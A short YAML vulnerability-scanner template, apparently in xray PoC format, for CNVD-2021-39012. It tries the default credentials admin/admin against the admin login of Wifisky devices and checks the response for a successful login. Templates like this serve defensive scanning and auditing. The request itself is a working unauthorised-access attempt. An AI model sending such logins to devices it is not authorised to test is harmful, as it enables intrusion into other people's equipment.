id: CNVD-2021-39012

info:
    name: Wifisky Default Password
    author: Print1n(http://print1n.top)
    severity: high

rules:
    r0:
        request:
            method: POST
            path: /login.php?action=login&type=admin
            body: username=admin&password=admin
        expression: response.status == 200 && response.headers["content-type"].contains("text/html") && response.body.bcontains(b'"success":"true"') && response.body.bcontains(b'"data":{"id":1}') && response.body.bcontains(b'"alert":')
expression: r0()
